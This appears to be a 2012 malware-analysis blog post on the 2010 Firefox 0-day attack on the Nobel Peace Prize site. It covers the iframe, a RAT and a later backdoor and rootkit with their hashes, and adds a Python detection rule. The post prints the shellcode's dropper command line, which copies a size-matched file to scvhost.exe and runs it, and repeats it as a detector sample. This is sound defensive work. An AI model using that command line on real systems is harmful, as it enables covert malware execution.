February 9, 2012
On October 26th, 2010 the homepage of the Norwegian Nobel Peace Prize Committee was compromised with a 0-day exploit designed for Mozilla Firefox. The Norwegian telecommunications company Telenor discovered this, and notified NorCERT and us.
How the Nobel site itself was compromised is not known. However, the details of the malware that was installed through it are available.
When the Nobel site was investigated, a small local iframe was discovered at the bottom of the page:
This pointed to the main malicious script, admin.php, hosted on a server in Taiwan. It contained the actual exploit, for what was later to be named CVE-2010-3765. The exploit was designed to trigger only on Firefox 3.6.8-3.6.11 on Windows XP, even though the underlying vulnerability might have been exploitable on more platforms.
The shellcode contained in admin.php was encoded and looked like this:
This script decodes to:
The interesting bit here is the statement that is the command line fed to CMD.EXE:
cmd.exe /c FOR /R "%USERPROFILE%\Local Settings\Application Data\Mozilla\Firefox\Profiles" %i IN (*) DO if %~zi equ 48640 cmd.exe /c copy "%i" "%temp%\scvhost.exe" /y & "%temp%\scvhost.exe"
Remember scvhost.txt, pulled down by the innocuous-looking reference in admin.php? It is 48640 bytes long. The shellcode simply walks the Firefox profile folder recursively, looking for any file of exactly that size; when it finds one, it copies it to an .exe file in %temp% and executes it.
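The command line above is a good candidate for a process-creation detection: a FOR /R loop that selects a file purely by its byte size and then turns it into an executable is very unusual in legitimate use. The following is an added example (not code from the original post or from Norman) of how such a rule can be expressed over Sysmon-style command-line fields. The log lines are constructed for the example; only the last one mirrors the Nobel shellcode.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample process-creation events (the CommandLine field only).
# Events 0-2 are benign look-alikes; event 3 is the Nobel shellcode's command line.
SAMPLE_EVENTS = [
    r'cmd.exe /c dir "%USERPROFILE%\Desktop"',
    r'cmd.exe /c FOR /R "C:\logs" %i IN (*.log) DO type "%i"',
    r'cmd.exe /c copy "C:\tools\a.exe" "%temp%\a.exe" /y',
    r'cmd.exe /c FOR /R "%USERPROFILE%\Local Settings\Application Data\Mozilla\Firefox\Profiles" '
    r'%i IN (*) DO if %~zi equ 48640 cmd.exe /c copy "%i" "%temp%\scvhost.exe" /y & "%temp%\scvhost.exe"',
]


@dataclass
class Finding:
    recursion_root: str          # directory the FOR /R loop walks
    size_filter: Optional[int]   # exact byte size tested with %~z, if any
    copy_dest: Optional[str]     # destination of the copy command, if any
    executes_copy: bool          # copied file is launched in the same command line
    reasons: List[str] = field(default_factory=list)


# FOR /R "<root>" %<var> IN (<set>) DO <body>
FOR_R_RE = re.compile(
    r'\bFOR\s+/R\s+"(?P<root>[^"]+)"\s+%(?P<var>[A-Za-z])\s+IN\s+\((?P<set>[^)]*)\)\s+DO\s+(?P<body>.*)',
    re.IGNORECASE,
)
# if %~z<var> equ <size>   (cmd.exe's %~z modifier expands to the file size)
SIZE_RE = re.compile(r'\bif\s+%~z(?P<var>[A-Za-z])\s+equ\s+(?P<size>\d+)', re.IGNORECASE)
# copy "%<var>" "<dest>"
COPY_RE = re.compile(r'\bcopy\s+"%(?P<var>[A-Za-z])"\s+"(?P<dest>[^"]+)"', re.IGNORECASE)


def analyze(cmdline: str) -> Optional[Finding]:
    """Decompose a FOR /R command line; return None if it is not one."""
    m = FOR_R_RE.search(cmdline)
    if not m:
        return None
    var = m.group("var").lower()
    body = m.group("body")
    f = Finding(recursion_root=m.group("root"), size_filter=None,
                copy_dest=None, executes_copy=False)

    s = SIZE_RE.search(body)
    if s and s.group("var").lower() == var:
        f.size_filter = int(s.group("size"))
        f.reasons.append("selects files by exact byte size (%~z) instead of by name")

    c = COPY_RE.search(body)
    if c and c.group("var").lower() == var:
        f.copy_dest = c.group("dest")
        if f.copy_dest.lower().endswith(".exe"):
            f.reasons.append("copies the matched file to an .exe")
        if "%temp%" in f.copy_dest.lower():
            f.reasons.append("destination is %temp%")
        # The copied path launched right after '&' means copy-then-run in one line.
        if re.search(r'&\s*"' + re.escape(f.copy_dest) + r'"', body, re.IGNORECASE):
            f.executes_copy = True
            f.reasons.append("launches the copied file in the same command line")

    root = f.recursion_root.lower()
    if "firefox" in root or "profiles" in root:
        f.reasons.append("walks a browser profile directory")
    return f


def is_suspicious(f: Finding) -> bool:
    """Core pattern: a size-selected file is turned into an executable."""
    return (f.size_filter is not None and f.copy_dest is not None
            and f.copy_dest.lower().endswith(".exe"))


def scan(events):
    """Return (event index, Finding) for every event matching the pattern."""
    hits = []
    for idx, line in enumerate(events):
        f = analyze(line)
        if f and is_suspicious(f):
            hits.append((idx, f))
    return hits


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_EVENTS):
        print(f"event {idx}: size={f.size_filter} dest={f.copy_dest} exec={f.executes_copy}")
        for r in f.reasons:
            print("  -", r)
```

Only event 3 is reported; the benign FOR /R over C:\logs is parsed but not flagged because it neither filters on size nor produces an executable. Matching on the structure of the command rather than on the literal path or the 48640-byte constant keeps the rule useful if the dropper's file size or profile location changes.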
Scvhost.txt is of course not a text file at all. It is a Win32 executable: a small and rather unsophisticated remote access trojan that connects out to the command-and-control server on either port 443 or 80 and ties the connection to an unencrypted command shell on the compromised computer.
That’s where the official story ended back in 2010.
But there is a continuation of the story that has not been publicly known.
Morten Kråkvik of Telenor TSOC (now my colleague here at Norman) logged accesses to infected lab boxes. And after a while, someone came in through the command shell and started issuing manual commands, like ipconfig and dir. And they uploaded more malware.
The new malware was a 90112 byte executable (explorer.exe, md5 b119c67b2fbff1824211c941ad5526ca) that extracted two more executables from its resources: a DLL (nmevtmsgc2.dll, md5 3b327465079c7b064aca4f3b629e3d92) and a driver (pclidec2.sys & rasacd.sys, md5 03f83728c5ded953d9838762b2dab9cf). This is a proper backdoor and rootkit, more complex than the first backdoor, but still with some clear deficiencies. It is for example not designed for operating systems newer than Windows XP/2003.
Accompanying these files was a configuration resource specifying the command-and-control server and what appears to be a campaign tag. The C&C server was identical to the original download point. The campaign code in this case was "US". If no such code is found in the configuration, the backdoor falls back to its default code, which is "LessNet".
The extracted executables contain easily recognizable strings, such as the rootkit project path:
Such strings make it easy to track other incidents involving the same (or related) malware. And sure enough, this malware has been used on other occasions. Below is a list of the cases where we know it has been used.
There are several aspects of this case that are puzzling. The malware used in these attacks is not very advanced. However, Firefox 0-day exploits don't grow on trees, and it is odd that the attackers chose to use such heavy weaponry for what was otherwise a half-hearted attack. My impression back then was that the attack was just intended as a sign of displeasure over the Liu Xiaobo Nobel Prize.
What is also odd is that the attackers appear to continue to use these backdoors in a low-intensity fashion (latest seen December last year), even if they are clearly outdated at this point in time. They are not even recompiled, packed or obfuscated to avoid detection.
Snorre Fagerland is a Principal Security Researcher in the Malware Detection Team (MDT) at Norman.